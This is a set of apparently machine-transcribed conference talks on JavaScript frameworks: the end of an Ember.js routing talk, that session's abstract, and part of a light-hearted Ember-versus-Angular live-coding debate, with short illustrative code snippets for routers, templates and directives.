a second argument to resource and then I'll just take this and I'll move it inside. And then because the URL is getting concatenated I'll just remove the file. It's no longer necessary. We'll just put the dynamic segment. 
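A rough reconstruction of the controller, the edit UI, and the nested-resource change made at the end here; the base class, the button markup, and the action spelling follow 2013-era conventions (actions as plain controller methods), so treat the details as assumptions rather than the exact code on screen:

    // app.js: the controller handles events sent up from the file template
    App.FileController = Ember.ObjectController.extend({
      isEditing: false,
      edit: function() { this.set('isEditing', true); },
      done: function() { this.set('isEditing', false); }
    });

    <!-- in the file template -->
    {{#if isEditing}}
      <button {{action done}}>Done</button>
      {{partial "file/form"}}   <!-- looks up the partial template named "file/_form" -->
    {{else}}
      <button {{action edit}}>Edit</button>
    {{/if}}

    // app.js: nesting the file resource inside files, as just described;
    // the {{outlet}} it renders into is covered next
    App.Router.map(function() {
      this.resource('files', function() {
        this.resource('file', { path: ':file_id' });  // the URL becomes /files/:file_id
      });
    });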
And then just recall that an outlet is a placeholder that you render your child template into. So now all we have to do is go to our index.html and I already added it. So basically just recall that there is an outlet here which is where this kind of parent resource will be rendered into. Okay so let's go back to files. And now when we click boom shows up right on the right hand side. And so I think that is pretty freaking cool. Like two lines of changes and all of a sudden we have this completely altered nested hierarchical UI but it hasn't busted our URLs at all. Everything has continued to work. So we can edit it and oh this is actually cool too. So as we start changing this you can see on the right hand side because these models are connected and they're all bound even the list on the left hand side starts to update now. Okay so hopefully that shows you just a little bit of the power of building an Ember application and walks you through the process. Basically you have templates connected to models. Those are all set up by the routes and those routes are all powered by URLs. And as you move around the application the framework is responsible for keeping the URL up to date not you which means it actually happens. So just to recap I don't think there's ever been a more exciting time to be a web developer. The pace of innovation is picking up it's incredibly fast. You know it's crazy. All of these technologies that we've had in computers since like the 80s. Things like being able to handle binary data and open files and open a socket. These are all things that we take for granted when we're building applications in a native environment. But we have web versions of all of these things right now and they're landing in browsers. It's time to start getting excited and think about wow now that the browser is a real honest to goodness application runtime how do we start harnessing that power and how do we start harnessing that power without breaking URLs. So a lot of the stuff coming in the browser is powerful to the raw features but they don't give you the architecture. So what Ember is about is giving you this application architecture to let you harness all these really powerful primitives and keep that URL up to date. And we're keeping it future proof. So basically we're working with the standards bodies to ensure that all of the features coming in the next version of JavaScript in the next version of the DOM API are compatible. In particular we're really hoping to take advantage of things like modules. There's new array proxies which will eliminate the need to do.get and.set. So be able to do model.foo equals bar and it will update automatically. And I think web components in particular is something that we're all very excited about which is basically a way for you as a developer to describe your, to basically create new HTML elements, describe their behavior using JavaScript. And that for us replaces the Ember view system and I think us and a lot of other libraries are excited about it and we're excited as soon as the stuff starts landing in browsers we're going to get it on board. So with that thank you guys so much. If you want to follow me on Twitter I'm at Tom Dale and I guess you guys are free. Thank you so much.
|
Many web developers are seeing the benefits of moving their application logic to the browser, allowing them to create interactive experiences that users love. A new generation of JavaScript frameworks has emerged to make this even easier. But many of these frameworks forget about the key feature that made the web in the first place: the URL! In this session, you'll see you how Ember's router puts URLs front and center. You'll also see how embracing convention over configuration leads to compact, predictable, and testable code.
|
10.5446/51521 (DOI)
|
We are shooting a commercial film for NDC right now. So we're going to do some pictures from on the audience. So people in the middle are going to be film right now. So if that's not okay for you, we will like you to move to the sides. And this will take like five, ten minutes. And as a film going to be showed on the internet page for NDC. Thank you very much. Okay everyone, welcome to the Cage Match. Between these two lovely guys here, just give them a round of applause first because they're going to be doing a lot of hard work in the next hour. And starting from the left we have Tom Dale. He's involved with the EMBA project, which he'll be showing you plenty of that in the next hour. And works for what? Tilda? Tilda, yeah, it's like the punctuation in Spanish for all my Spanish speakers out there. Okay, and then on the right we have, he possibly needs no introduction to this audience. It's Rob Connery of TechPub and obviously, well-known man in the dot net world. So we're here to talk about JavaScript today. Previously there have been contest streams like Rails and ASP.net and stuff like that. But we're now going to say that's a lot more applicable to everyone. Nowadays if you're working on the web, is using JavaScript in one way or another. You might be using some sort of derivative course like a Dart or a CoffeeScript, but ultimately if you're going to be in the browser you're going to be using JavaScript. And JavaScript has had a very interesting history. I remember when I first saw it very early on when it came out. It wasn't that useful for very much. Perhaps all you could do if it was, you know, check things were entered correctly on a contact form, maybe get some snow to fall down a web page. I know there are still many e-commerce sites that do that type of thing. If you do it, shame on you. But things eventually progressed and became more interesting. Around the early 2000s, Microsoft introduced this technology for doing direct requests from JavaScript through the browser. And eventually other browsers took this on and it became a thing we all know as Ajax. And that's when things became interesting with the whole Web 2.0 world and things were more interactive and you could update pages about doing anything. And so that kind of brings us to almost the world we're in now, which is where we ended up with libraries like jQuery which made our lives a lot easier, things like Backbone provided some structure. And then there were bigger things like Sproutcore, for example, which was a framework, which still is a framework, still exists, for building larger apps online. And I think Apple used it for their iWork, their online, you know, Office apps stuff. But then kind of out of all of that, we've kind of almost gone full circle back from this, let's put a desktop app on the Web back to let's just use the Web for what it's good for. We now have the JavaScripts with which to do that. And so that's the context we come to today with the two libraries we're going to look at all. I guess you could say frameworks even. So Ember will be on the left, Angular will be on the right, and we're going to do a comparison of both of those. So the first question I just want to ask to get this going is why would you even want to make an app that's so heavily JavaScript based and is, you know, a single page essentially with JavaScript detached, and not like perhaps we used to using something like Rails or an ASP.net and just, you know, providing it all from the back end? 
Because I like coding on the server side. I don't want to be coding on the front end. So why should we be doing this stuff? So Peter, I think the real reason is that if you think about what's actually going on in the Web browser, the way we've traditionally built these Web apps, the whole thing is a massive hack. Think about what's actually happening. You have a browser and... Wait, are you talking about Ember? No, no, I'm talking about all these older... Sorry. So Rob and I had beers. We preemptively had beers last night so that when this knock-down drag-out match really starts happening, we preemptively know hard feelings. So I think if you think about what's happening, it's a massive hack where you're using these Web applications, but your UI is being rendered on a computer in a data center miles and miles away. And what that means is that unless you have perfect conditions, you're always going to have a little bit of latency between when you click on something and when it responds. Especially when you think about the proliferation of like 3G networks or especially in countries where they're still developing and you don't have these high-speed connections that we take for granted. And I think the other thing is that if you think about how most applications are built, whether it's a mobile app or a desktop app, you're consuming a JSON API, right? And so what ends up happening is that your Web application is this weird, hack-together mess. It's like a very angular-like mess of your API and your Web application logic and all these kinds of things. You keep talking about Ember and I'm like, come on, what are we doing here? So separating the... I think we all agree that separation of concerns is important. Having well-factor code is important. And separating the presentation from just generating the JSON data I think is a really good way to architect these applications and basically if you think about it, it brings everything into unity. Your Web application consumes a JSON API, your iOS application consumes a JSON API, and your desktop application. How many of these did you drink? 17. Okay, I just want to be sure. Just for you. I think the beers might be... We've talked about having beers before the talk. Yeah, this is an Irish coffee. Yeah, so I was going to say I wanted to... Because that's really how you're supposed to write Ember's flat drunk and then it all makes sense. Ballmer peak. That's right. Okay, guys, so all right, let's say you've convinced me at this point. I know jQuery. I'm sure many people here know how to use jQuery. You can do all the basic stuff with that. Why wouldn't I just do what I've been doing previously, making Ajax requests using jQuery and stuff like that? Why wouldn't I take that approach? Why not just use jQuery instead of Angular or Ember? Well, at some point, I was just talking about this the other night. Someone is looking at me and saying, why do I need this big monolithic pile of garbage? Why don't I just use jQuery? And I said, well, by the time you're wiring an event for five different things across your screen and you're juggling all this stuff, with jQuery, you begin to load JavaScript. And I think that's where these frameworks come in. They just help you do a simple thing and you're on with your day. Oh, nice, nice simple answer there. You like that? Okay. I haven't had 10 cups of coffee. Well, we'll get to see these cups of coffee in action now because they're actually going to start to develop something now. 
This is actually getting things up to scratch, the most basic kind of boilerplate, doing some binding, all that type of thing. So this is now where I get to almost take a bit of a rest and step back and just egg you on from the side. If anyone wants to heckle from the audience, you are more than free to do this, of course. Heckle him, yeah. Heckle him both. So first, we're going to start with some boilerplate and get going. So we'll start with Ember. I'm basically going to show you how easy it is. We're going to get you set up. If you want to get started with Ember, the best way to do this is just to visit emberjs.com. We have a link to a starter kit. If you click on the starter kit link right here, it will download a zip file that has all the dependencies and an HTML file ready to go so you can basically hit the ground running. I'm going to be using that. The only modification I've made here, if you look at the top, I've actually included Bootstrap CSS. So both Rob and I will be using Bootstrap CSS for the purposes of this demo. So the first thing we want to do is just put some data on the page. And I'll show you my application, sorry, my Ember.js here. I'm going to delete everything. And the only thing I'm going to have here is this application file. So I'm basically telling the browser, hey, create an Ember application. And that's basically all you need. Ember takes over at that point. It's like, all right, we're going to be building an Ember app. And the first thing it does here is it's going to go look for a template, a handlebars template. So how many people here are familiar with the handlebars templating language? Okay, a lot of you. Yeah, a lot of people. Great. So the idea here is basically that dynamic values are just wrapped in curly braces. So check this out. I'm just going to put an H1 tag. And I'll say, hello, NDC. And now if I come back and reload our page, you can see that my H1 tag shows up. Well, that's pretty boring. Let's try to make that a little bit more dynamic. So the first thing I'm going to do is just create a text field that's dynamic. So I'll say, input type equals text. And we'll just bind the value to a property called title. And now we'll just replace this NDC with title. We'll reload the page. And you can see as I type, it's actually live updating that title. So I didn't need to write any code other than creating the application. All I do is create this dynamically bound text field. You can see I'm just binding the title value to this title property here. And Ember automatically keeps them in sync. So we're done. That's it. Thank you for coming. Thank you. Sorry if I unplug you. Now we get to see the other side of things. So work when it works. I think the display port's full of Ember weirdness. There we go. So before I get started, can you guys hear me? Okay, you can. Before I get started, this is a coupon code for a tech pub. Clap for me. Okay, please. Thank you. Thank you. Sorry. I just had to pull out the stops. All right. So Angular works in almost the same way in principle. You have an application. The application has controllers and kind of similar concepts except Angular works heavily with the DOM. You're able to do templating things like Tom just did. But basically, all you have to do to work with Angular is number one, Reference it, which I have it down here at the bottom of the page. And at some point in some tag, you need to tell Angular that this is an application. And you do that right in the DOM using a tag. 
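A sketch of the two-file Ember demo Tom just finished, before Rob's Angular version continues below; the {{input}} helper is an assumption, since the transcript only says the input's value is bound to title:

    <!-- index.html -->
    <script type="text/x-handlebars">
      <h1>Hello, {{title}}</h1>
      {{input type="text" value=title}}
    </script>

    // app.js
    window.App = Ember.Application.create();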
And so I'm saying that is an Angular app. And so next up, I can tell Angular I want to do something. And so we'll do an H1 tag. And inside here, let's see. I'm going to put, let's just say, message. And I'm using the same templating syntax, but this is right inside the DOM. And that's the key difference between Angular and Ember, is that Angular hijacks your page. Anything that's wrapped with NG app is hijacked. So think of it that way. So what you're saying is Angular has to scan the entire DOM every time the app boots up. I don't know. No, it doesn't. So let's see. Input. OK. So now what I want to do is I want to do some binding here. And I want to set this to type text. And so to bind an Angular, you just have to simply say ng model and give it a name. And we're going to say this is message. And so by the virtue of this having a model and saying the name is message, we have message here. That's where it's going to be output. So I save it. And then I go over to my page right here and reload. And that's lovely. And have some CSS problems. So watch this on the fly. Let's see. Style equals. I'm giving you a prime chance right here. I just never watched a man drown before. There you go. There it is. There it is. OK. So the same kind of deal. And that's pretty much how you work with Angular. A very similar approach except you don't have that nasty handlebars. Wait, hold on. I thought Ember was supposed to be really hard to get started compared to Angular. It seems like they're basically the same thing. Except for the fact that the Ember app actually scales and doesn't collapse on itself. OK. You remember the coupon thing, right? I want to hear some booze people. Come on. I don't think the audience is on your side here, Rob. I'm sorry. OK. As you were. So what do you think? Yeah, it's good. I must admit, I kind of like the Angular thing about you can actually type HTML. I kind of already know HTML. Well, so... I'm not sure how close is what you're doing. Well, here's, I think, the really neat thing is that Ember as a framework really embraces HTML. It's not like some of the previous generation of JavaScript framework that said, hey, throw away everything you know about the DOM and HTML and CSS and use our widget library. We do not believe in widget libraries. We believe in embracing HTML. And so if you look at what we're doing here, the way that I want you to think about this is the difference between a dynamic tag and a static tag is just to replace these angle brackets with curly brackets. So when you're looking at your template, you can see what's dynamic because there's these two curly brackets instead of having to look for ng-attributes everywhere. It's very obvious what's dynamic and what's not. OK. So now I want to step further and actually make this a bit more interesting, a bit more interactive, because obviously putting text on the page, you know, I could do that in jQuery in like a couple of minutes. Right. This makes it easier, but I'm not just going to load up Ember or Angular just to do this type of work. So if I should want you to think useful now, what's the next step we can take with this? Sure. Just to see the power. Yeah. So let's just put maybe a list of some things on screen and be able to click around. So actually one really nice thing about Ember is that we make you think about URLs upfront. URLs are such an important part of the web and, you know, a lot of people think that if you use HTML, CSS, and JavaScript, that makes you a web developer. 
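For reference, the two "hello world" demos above boil down to just a few lines each. This is only a sketch: App, title and message are the names used on stage, and the Ember input helper syntax varied slightly across the pre-1.0 releases of the time.

  // Ember: app.js -- creating the application is all the JavaScript this demo needs
  window.App = Ember.Application.create();

  <!-- Ember: index.html -- a handlebars template with a two-way bound text field -->
  <script type="text/x-handlebars">
    {{input type="text" value=title}}
    <h1>Hello, {{title}}!</h1>
  </script>

  <!-- Angular: everything inside the element marked ng-app is managed by Angular -->
  <body ng-app>
    <input type="text" ng-model="message">
    <h1>{{message}}</h1>
    <script src="angular.js"></script>
  </body>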
But in fact, these are just technologies that happen to be in the browser. But what really makes a web developer is someone who cares about URLs. If you don't care about URLs, you are not a web developer. So the way that you think about stuff in Ember is basically the first step is what's the URL for the template I'm about to show on screen. So to do this... It's like URL driven development kind of thing. Yeah, yeah. That's a good way to think about it. It's like if we have anyone... You can get points and then you work back from those. Right, right. And basically instead of the URL being something you just tack on at the end, something your manager comes and says, hey... Rails. What's that? Rails. Yes, yes. Very inspired by Rails where you think of... URLs are important, right? They're the thing that makes collaboration and sharing on the web work. So instead of being a thing that you just tack on, your manager comes and says, hey, I noticed that when I reload the page, everything breaks and I start back from scratch. We want you to think about these URLs from the start. So to do that in Ember, you have this router object. And the router object is responsible for basically translating these different URLs into templates that go on the screen. So let's say... So by default, we have a route called the index route. And that's basically the template that gets displayed by default. So I don't actually need to define a route at all. I'll just go into my index.html file here and I'll just name this template. The way that you name a template is basically you give it an ID. So we'll just call this index. And now if I reload the page, you can see this content is still here. But now let's say I want a new page. Let's say I'm working on like a blog or something. We can make a new page just by going and thinking, okay, what's the URL that would be associated with this page? So to do this, we'll just say this.resource about. And now we'll go and create the template for that page. So we'll call this about. And now we want to have some kind of navigation menu. How do we do that in Ember? The way that we do that is there's a template that's always on screen. This is basically, if you think about how you would normally develop a web application, you have like a header and a footer and then the content in the middle kind of changes, right? So the way that we do that in Ember is we have a template called application. So I'll just call this like my app. And then in order to tell Ember where all the sub-templates render, we just have a little handlebars helper called outlet. We're still working on the web, right? Yep. Okay. And now in our application template, we'll just put a link. So we'll say link to home. And that pound link to, is that a macro? This is actually, yeah, it's a list derivative. And then we'll link to the about page. I'll say about. You know that link to is six times less efficient than I. Because anchor tags, you don't want to be using that, right? Okay. So now you can see without writing any JavaScript code whatsoever, I just click between home and about, and you can see that it actually changes between these. And the important thing here, look at that URL. It's updating automatically. We didn't have to write any code to keep the URL up to date. It means that we can refresh the page. And so you can see I'm on the about page. I hit refresh. The about template shows up right inside that outlet that we defined in our application template. 
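Roughly, the routing setup just shown looks like this in an Ember 1.x-era app. A sketch only: the template ids and route names follow the demo, and the link helper was written {{#linkTo}} in some pre-1.0 releases.

  // app.js
  window.App = Ember.Application.create();
  App.Router.map(function() {
    this.resource('about');   // the /about URL renders the 'about' template
  });

  <!-- index.html -->
  <script type="text/x-handlebars" id="application">
    <h1>My App</h1>
    {{#link-to 'index'}}Home{{/link-to}} {{#link-to 'about'}}About{{/link-to}}
    {{outlet}}   <!-- the current route's template renders here -->
  </script>
  <script type="text/x-handlebars" id="index">
    {{input type="text" value=title}}
    <h1>Hello, {{title}}!</h1>
  </script>
  <script type="text/x-handlebars" id="about">
    <p>About this app.</p>
  </script>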
If I go home and refresh the page, you can see that the correct template is displayed. I have full back buttons. I can command click to open. Basically URLs work as expected without any code at all. So how does this affect my SEO positions and everything? Well, that's a great question. Well, the nice thing is that because you're writing your application using handlebars templates, there's basically a bajillion implementations. You can run it in Java. You can run it in Rails. So it's really easy to take your handlebars templates and basically render them on the server. You did that well. Thank you. Okay. So now let's see how this is done properly by Rob. Oh, geez. See, he's on my side. I'm not taking any sides here by the way. Yeah, right. No, hey, man, it's good. It's good. Don't feel sad, okay? You know. Sorry. We'll hug afterwards. All right, that's true. Okay, turn on. I must say though, definitely my favorite is Tom's for actually being able to see it because this is, what's this, 640, 480? Yeah, it's so, because I like to, I'm nearsighted. Well, the thing is with Angular doing dirty checking at that resolution, it just bogs down. Exactly. And it's a little bit older, the eyesight. Oh, geez. Wait a minute. Didn't we? All right. Angular works, Angular works well for demos. So what you guys are seeing is always a really fun demo. Like, woo, look at binding with just a few tags in the DOM. And so now that we're going to do some routing, we've got to do things a little bit differently. Welcome to the real world. Welcome to the real world. Why am I surprised every time you add a new feature, you have to rewrite the app. Exactly. Okay, so the first thing we're going to do is we're going to give our app a name. Right here, I just said ngapp. That's kind of a global thing. Like, there's an app somewhere here. Go find it. And so like you said, Angular scans the entire DOM. It's not really fast and I eat. Yeah. Did someone turn off your microphone? That's too bad. So I'm going to just put Ember, let's see, Ember sucks? No, that's not too harsh. Ember really sucks. That's my app. No, that's too hard to type. Ember is love. Good thing you have an ID to help you here. It's WebStorm. Come on. Let's see Camelkaze back into HTML. You like that? I know. Very Daltonette, then. That's so retro. Listen to you guys. So the first thing I want to do is I'm going to create an app. So the way you do that is you just say var, let's call it app, equals Angular.module and then you give it a name. And so in this case, we need to just tell it the name that we put above. Ember is love. So is it a module or an app? It's a good question. Angular is very modular. So when you declare an app, you can have your app be one single module. You can have modules that work with other modules. It all works on a principle called dependency injection, which is what I'm going to declare right there. So the dependencies for my app, and right now it's nothing. To me, I hate this API because why don't I just leave this as empty? Because there is no dependencies that I'm putting in there, but if I do that, it will break. Yikes. Yeah, so that's kind of a weird little API bit. So the next thing I want to do is I want to define a controller. Actually, no. I wanted to app.config. Config. See, I blow this all the time. It's config. It's not configure because at extra URE, that's just way too hard to do. It seems really ad hoc, I'm not really that well thought through, Rob. Okay, so anyway, I'm going to inject a route provider. 
So what this is going to do is it's going to let me to work up some routes. Now this is the thing with Angular that you have to get used to right away. Dependency injection is everything. And if you try and do something with any of the core bits in Angular, it will break unless you inject the thing that you need. So let's see, and I'm going to say route provider.win. Hey, thanks. Win that and oh, God, when? And no, that's not right. So you got a module that you can configure to provide a router to do some dependency injection. Is this a framework or a computer science textbook? Right? I know as I'm writing this out, I'm having brain lock, I'm like, oh, God, this is how you do it. So let's see, then I have to tell it, let's just use the templates. I had this one be quicker. I thought Angular was so easy to get started with. I'm under the gun. Alright, so template URL and we're going to say this is going to be home templates. And then I'll set a controller. And that would be home controller. Okay, and that means I need to come up here and erase this stuff. Wait, but if the template's named home and the controller's named home, can't you just put them together? You have to write code to do that. Brutal, brutal, brutal. Okay, so I need to do a script tag and here's another fun thing. Oh, I thought there were no script tags. What's going on here? You were just clowning me about there being script tags and ember. Okay, I have to finish this at some point. You don't mind if I do, right? Tom, do you think we should go and get lunch? Yeah, probably, yeah. How about Thai? Yeah. Sushi sounds good. Yeah. Okay, so anyway, I'm going to say this is home. All right, so I'm going to do the same thing below here. And I'm going to create two templates. And I'll say this is the about template and I'll say about. Wait, it says template URL, but you're not actually creating a separate file. How is that a URL? So with this size, right, it's a good point. So what you do in here is you can specify two things. I can say template and I can just pass in straight up HTML and have it just puke out on the page. I can do template URL if I want and I can name my thing.htm if I want. And it'll go and try and scan the DOM and find it on the page and then it'll just use that. If I want to have it as a separate page that's off on the server somewhere, it'll go ahead and pull it down and everything will work ideally. See, now that is cool. You like that? Yeah. I do like that too. So, okay, so I need a controller now and so, you guys still awake? So let's see. We'll blame it on old age and not Angular. So I'm going to call this home controller and then function and I'm going to pass in a thing called scope which I'm going to talk about later on. How do you guys spell scope? And yeah, that's it for right now. And so, right, so I need one more controller. No, I don't. So let's see. So let's do another route here. And I'll just say when about. And I'll pass in this and it's going to be template URL. It's just kind of like Java now with a lot of boilerplate going on. Yes, it is. Actually, this is the big cliff when you start doing stuff like this, it all of a sudden takes on a little bit of. So I guess this is like the benefit of some, you get tools like Bower that will like create a project from scratch and it will fill out a lot of this stuff. Well, that's not Bower. That's Yeoman, right? Bower, yeah. Is it? Oh, that was dependencies, isn't it? Yeah, Bower is the package. Yeah, Yeoman is the whole kind of suite of things. 
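A sketch of the Angular routing being assembled here, assuming the Angular 1.0/1.1-era router that still shipped inside core angular.js. The module name follows the demo; home.htm, about.htm and AboutCtrl are filled in for illustration.

  // app.js
  var app = angular.module('EmberIsLove', []);

  app.config(function($routeProvider) {
    $routeProvider
      .when('/',      { templateUrl: 'home.htm',  controller: 'HomeCtrl' })
      .when('/about', { templateUrl: 'about.htm', controller: 'AboutCtrl' });
  });

  app.controller('HomeCtrl',  function($scope) { /* ... */ });
  app.controller('AboutCtrl', function($scope) { /* ... */ });

  <!-- index.html -->
  <body ng-app="EmberIsLove">
    <a href="#/">Home</a> <a href="#/about">About</a>
    <div ng-view></div>   <!-- the matched route's template renders here -->
    <!-- inline templates; templateUrl can instead point at a file on the server -->
    <script type="text/ng-template" id="home.htm"><h1>Home</h1></script>
    <script type="text/ng-template" id="about.htm"><h1>About</h1></script>
  </body>

Injecting by parameter name like this is also the thing that breaks under minification, which Rob brings up near the end; the array annotation form avoids that.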
What's going on with your white space here? What is this? What's going on my way? I don't know. Something weird. Okay, so this is the, okay, so here's what I got so far. Trying to build some routing in here. I'm trying to build an app. So I've got, let's start at the top. I've got an app. I'm giving it a name. I've got some templates right here that I'm going to be working with, home and about. Okay. And so these things need an outlet. Just like an Ember, you have an outlet, you have like an application script tag. The final thing I need to do is tell this thing to render itself inside of an NG view. And that's where everything goes. What are the chances that I did this right? Well, that was a lot of code to type. Yeah, especially when someone's chirping in your ear, but whatever. I'll forgive you. I put your name for your stamina. Yes, what? Wait a minute now. I'm not touching that with a 10 foot pole. Yeah, look at that. It worked. Bam. So good. So what I got straight away is I got this, I got this hash bang upstairs, bang URL. That's how you know that everything's being rendered. And I didn't actually add a link. Let me just do that really quickly. Yeah, what about the links, Rob? So let's do a, because I can just use anchor tags. Is that okay with you? Okay, this is the six times efficiency kicking in now. Yeah. So then we'll just do this. This gets faster, we promise. So you actually just use, there's no helpers here, which I kind of wish there was. But so we'll do that and refresh. And so home, go here and about here. And if you refresh, those are the right things. Let's see. Refresh. Oh, that's gorgeous. URL, you like URL. Oh, those are beautiful. That's great. And I should mention that there's a way to get rid of that pound sign, but I don't know what it is off the top of my head. Sorry. Okay. Yeah. All right, I want to make professional heads. So represent Hangulite, you can see. All right, I want to mix this up a little bit. I want to mix this up a little bit. Okay, do it out. Okay, here's what I want to do. So I'm going to take this demo that I had before. So actually what I want to do is move the about page inside, nested inside of the index. So basically what I want to happen here is if I click on about, I don't want it to remove home page. I want to basically render in addition to home page. So instead of replacing the old content, just render an addition to it. So the way I'm going to do that in Ember is I'm just going to add what we call a nested resource. So let me say, it's not resource. Yeah, that's not confusing at all. Yeah, it works exactly like every other framework. It's really confusing. Just a zinger. Okay, looks like you have some syntax problems there, buddy. Whoa. All right, JavaScript. How does it work? I say that every day. Okay, so now I'll just go and I'll just move this outlet into, I'll add basically nested outlets. So basically the way to think about Ember is look at the top. It's just a template and it's backed by a model. And then inside of that template, you can have another template. And inside of that template, you can have another template. Your UI can basically get as recursive as needs to happen. Basically your designer comes to you. They have a complicated UI. You're not using Angular. You say no problem, we'll implement it. Okay. Oh, shh. All right. I have to say it, I'm not teasing you. This is the truth. That when you do hit an error with Ember, it's really descriptive. It is. Oh, yeah. Wow, thank you. That was really nice. 
Well, no route match the URL. I mean, you know the exact problem. It's kind of cool. I mean, when you... It's even going so well for Angular, though, is it really? Well... You're now kind of joining sides with... Yeah, I know. I'm like, can I just... Anyone want to stand up for Angular here? Come down here? No, but it is kind of cool because when you get a problem with Angular, bad. You have no idea what the hell that thing is saying. All right, so now you can see... So this is actually pretty neat, right? Is that when I'm at home and when I'm at slash, it's only showing our template for... Let me make this full screen. It's only showing our home page template, but because I've defined this nested route, it basically means when I visit that URL, render it inside of the template instead of replacing it. And you can see this is very little code. All I had to do was nest the resource inside of its parent. And now when I click on about, it renders both of these. If I command click, you can see it'll do the right thing. Apparently not. We can pretend. For some reason, my command click is not working, but when I copy the URL and refresh, you can see it does the right thing. So let's see it. Let's see this in Angular. Just pretend it worked. It did work. It totally worked. It worked. These are not the droids you're looking for. This is not the framework that you want to use. My computer keeps turning off. Uh-oh. Here we go. I'm realizing I need one of those new MacBook Airs with the all-day batteries. Oh, man. Okay. URLs in Angular are just a manual affair. So if I wanted to change the URL, like what did you do? You just put it inside of another... Nested it inside, yeah. So basically when you visit slash, it shows the home template, and when you visit slash about, it renders the about template into the home template. Yeah. Not. So at this point, so that's actually an interesting thing. At this point, this is where Angular and Ember kind of separate. So if that was something that I needed to do, I would create a separate template here and either make it a directive. Directives are encapsulated little bits of UI. Or I'd ask Tom what the hell he's talking about. But it's not... Angular doesn't do the nesting thing in that way. So it's not really a good... Is there any way to do it? Are there any libraries or projects? See, this is the thing. What are you trying to do here? I mean, I'm serious about that. Are you trying to... I'm picking examples that look good in Ember and they come out and mess you up. So if you want to... Let's let go ahead. Let me give you the use case. The use case is you have a list of blog posts. When you click on one of those blog posts, it's going to show the blog posts onto the right-hand side, right? So if you don't want to replace that list, you want to be able to show it on the right-hand side. Yeah. All right. Well, so this is... I wasn't going to get into directives until later, but let's just take a look at it. So one of the things about Angular is the concept of directives, which is encapsulated UI, and it can be really low level or it can have its own controller and be high level. So if you wanted to show something like a display of blog posts, let's say, you could have something like blog posts. Let's just call it this blog posts. And so again, inside of here, we could say, well, do we need anything to be injected into here right now? No, I don't. And so I'll just do the simplest thing. I hate this UI. 
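For reference, the nesting Tom just showed amounts to roughly this. The names here are illustrative; the point is that a nested resource renders into its parent template's {{outlet}} instead of replacing it.

  App.Router.map(function() {
    this.resource('home', { path: '/' }, function() {
      this.resource('about');   // /about now renders inside home's {{outlet}}
    });
  });

  <!-- the parent template keeps its own content and gains an outlet -->
  <script type="text/x-handlebars" id="home">
    <h1>Hello, NDC</h1>
    {{outlet}}
  </script>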
So first thing I'm going to do is I'm going to tell it I want this to be... I want this to... Whoopsie. Sorry. Return. Yeah, why do you use this? This is WebStorm. Restricts. Rob's fat fingers. Okay, restricts. E, that sounds pretty intuitive. Yeah. Pretty... Isn't that neat? Yeah. Transclusion. Everybody run. So I'm going to just say... I'm going to put an H1 in here just for now and just say blog posts. So what I've done here is I've just said this is a directive. It's got a name, blog posts, and it's going to be an element on my page. By default, it's an attribute. You can also have it be a comment. You can have it be a class. So you basically can have this directive attach itself to the DOM in a couple of different ways. So that E means element. Yeah, E means element. So... Oh, look that one up on the cheat sheet. Yeah, I know, right? As to which one you choose, that's up to you. So the way I'd use this is let's put it inside of here and I would just say blog posts, bam, and jeez, what are the chances I did this right? So up it comes... Oh, because I need to be on the homepage. There it is. So it just shows up, blog posts. It renders the things straight in. Now if I wanted to do more, let's say I had to work with data or do other things, I could come in here and say this has got its own controller and I could either specify it by name or create the function right in line right here. Typo. Thanks. No one else heard that, right? Anyway, I could specify the name of the function here. It'll be called invoked and then I could have controllers backing this directive and that's how you do that. What if you want more than one HTML element? You can do the same thing with directive templates. You can say it's a template URL and specify that somewhere else on the server. I was actually going to talk more about directives later so I'm going to sidestep this, but that's kind of how you do it, but it's not exactly the same thing. Because you need it to be conditional. Well, it's not tied to a URL, which I think is an important difference. Yes. I really do. I think it's very, very important to note that. Okay. Okay. Let's get to a little bit more meat in all of this then. Yeah, this is actually meaningful. It's actually interactive, something in the real world. Because I mean, currently this is all very academic and you seem to be typing for a long time. It's good actually. It seems to angle is really good. It's why I do videos. Yeah. If you want to like, practice your typing, it seems like the way to go. Or if you want to make your manager think you're really busy all the time. Exactly. I mean, it's all about lines of code, right? So. You're on my side. Yeah. I was on your side. That's what's going on. Until you watch your typing. You're letting me down here. Sorry. I'm hoping you're going to bring this back. I'm coming. What's a dollar scope? Oh, sorry. Oh, wow. We'll talk about that in a second. Okay. Go ahead. Yeah. So if we want to interact with a remote service now. So I make your lives about 100 times more difficult now. Or maybe not. Maybe you can show me how easy it is to do this in Ember. Sure. Let's do it. Okay. So. I mean, you pre-built something, haven't you, for doing this? Well, what I've got is actually Rob has prepared for me a node endpoint. It's just a JSON endpoint that is returning some data. So how do I get this probably go to localhost 3000 slash API. Yep. Okay. So this is our JSON payload. 
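The directive Rob sketched out a moment ago comes out to roughly this, with the names from the demo:

  // usable in markup as <blog-posts></blog-posts>
  app.directive('blogPosts', function() {
    return {
      restrict: 'E',                    // E = element; A = attribute, C = class, M = comment
      template: '<h1>Blog posts</h1>',  // or templateUrl pointing at markup kept elsewhere
      controller: function($scope) {
        // a directive can carry its own controller, and optionally an isolate scope
      }
    };
  });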
So I think what we want to do is basically just turn this into the model that backs our template. So as I was saying before. Oh. I told you it was going to make it. Is that photo going to make an appearance? All right. For all of us. These prices in Norwegian Kroner or dollars. Yes. All of them. All right. So the way that we do this. So in Ember, like I said, the way that you want to think about it is just these series of nested templates and each of those templates is backed by a model of some kind. Now the way that we tell a template, which model that should represent is by creating this route. I showed you my little trick of shaking the stage. Am I back in California? Where is this earthquake? No distractions. This is the big one. We're standing about 200 feet over the ground. Doesn't matter. This API basically writes itself. Oh. Okay. So. That is a throw down right there, my friend. So what we'll just do here is we'll say app.application route. Let me go delete all of my templates. So we'll delete these and I've got my application template here. So all I want to do is basically say what the model for this template is. So we'll do a model. This is just a hook basically that returns whatever data you want represented. And then we'll just use good old dollar.getjson here. And this URL is a slash API. It's weird because that looks just like jQuery. Yeah, weird, right? Yeah. Totally. You're just using jQuery. Why reinvent the wheel? Why have a transclusion generator, HDP resource provider? Or why use ember is kind of what I'm thinking. Because we did have degrees for something. That's right. Yeah, remember I got to look busy. So I'm just going to say return dollar.getjson API. Now if I look on here, I basically see that there's a title. So let's just make sure that this is working. So I'll just put in title here. This is basically just going to pull this attribute off the model. So can I just ask when you return from getjson, that's returning a promise, right? Yes, that's correct. So basically the model hook knows how to deal with promises. So if you return a promise, it just waits until it renders the template until that data is finished loading. So do you guys know what promises are in JavaScript? So it's basically saying there's something that's going to return from this. And when it's done, you call this function basically, right? Yeah, so a lot of times you have to work with that manually, but that's kind of interesting that Ember will do that for you. See, I'm being nice right now. Have you noticed 